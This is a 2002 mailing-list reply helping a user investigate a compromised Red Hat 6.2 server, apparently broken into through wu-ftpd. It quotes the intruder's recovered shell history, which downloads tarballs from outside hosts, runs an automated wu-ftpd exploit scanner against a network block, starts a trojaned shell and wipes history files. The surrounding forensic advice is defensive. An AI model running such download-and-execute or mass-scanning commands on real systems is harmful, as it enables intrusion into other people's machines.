On Mon, 18 Nov 2002 mails@munshi.dyndns.org wrote:
Well, I have been hacked and my /var/log/messages has next to nothing
Ok, well first of all, I request that you don't say hacked when you really mean cracked. It's not nice to insult the people who's help you're asking for.
in it. I am keen on getting to this person who did it. Fortunely I
/var/log/messages will have been cleared up by the cracker, but unless you have backups, I don't think you can get that back.
(This is the first line) Nov 18 02:22:53 munshi userdel[8048]: delete user `ftp' Nov 18 02:22:53 munshi userdel[8048]: remove group `ftp' Nov 18 06:24:41 munshi ddclient[23392]: WARNING: cannot connect to checkip.dyn$
Is something missing at the end of the above line? It looks like you've used pico to view the file and the mouse to copy paste. I'd suggest making a copy of /var/log/messages and editing that, and then copy the lines as it is into your mail.
Also, who did the userdel for ftp? Was it you or do you suspect the cracker to have done this?
The part after 6:24 is proper, but my net wasnt working at that time (this is a normal thing and I do not susspect the hacker to do this, it is a normal thing and happens almost everyday, I get loggedout from my servers, the network is up but I cant access the internet also
Do you know why this happens? If not, how long has this been happening? It is possible that you might have had a trojan on your system for quite some time. In that case, unless you have logs from right back then, it will be hard to find out what's happening.
The .bas* were deleted, but unfortunately for the hacker the .bash_histrory has some important data there,
cd /dev/ida/.sys/trojan
^^^^^^^^^^^^ how long ha this been there?
wget www.geocities.com/master0n/bestwu.tgz tar zxvf bestwu.tgz
this is a wu-ftpd exploit script. You really, really, really shouldn't be running wu-ftpd, but, too late now.
My guess is that you're wu-ftpd also had anonymous ftp enabled, which is all that's required to get into your system.
Now, the thing about autowu is that it automatically scans a network block and attacks all hosts with port 21 open. Looking at my logs shows many such scans. You might want to look at /var/log/secure - if you have it.
cd aw make ./awu 24.132 cd .. lsd ls rm -rf aw bestwu.tgz ls wget www.geocities.com/dont_haxer/b.tgz tar zxvf b.tgz rm -rf b.tgz cd .b ./bash ./bash cd /root rm -rf .bas*
After that is what I had been doing. So that is the last entry.
Is this your .bash_history or root's? Check root's bash_history as well.
So my .bash_profile has been deleted and that is how I came to know that something i wrong, I have not rebooted my system as yet, and do
have you disconnected from the network? At this moment you could be scanning other people.
not thing it is necessary. There are a few other things that amaze me here are
- First is the time 2:22am to 6:24am is free where as there should
have been entries from ddclient, a program that I am running. 2. The /dev/ida/.sys directory should exist since that is where the above commands have been run and there is no command that is deleting that directory in .bash_history. 3. netstat -a, ps ax are not working since the required libraries are not present, so I cant check which ports are open. The error given by netstat -a is
bash# netstat -a sh: error in loading shared libraries: libtermcap.so.2: cannot open shared object file: Error 23 cat: error in loading shared libraries: libc.so.6: cannot open shared object file: Error 23 egrep: error in loading shared libraries: libc.so.6: cannot open shared object file: Error 23 cat: /root/.net: Too many open files in system
/root/.net?
Please run chkrootkit on your system.
you seem to still have some trojaned software around.
INFO Working on RH6.2, full installation. telnet was off, ssh is not there, ddclient may have opened a few ports that I may have not noticed, I just downloaded and installed ddclient just two days back, but it is a perl script, I have not yet gone through that script as yet.
ftp was running! that's the main problem.
It's very hard to figure out who's done this without more logging information. look at /var/log/loginlog, /var/log/secure, /var/log/wtmp
Chances are the cracker missed those files.
Philip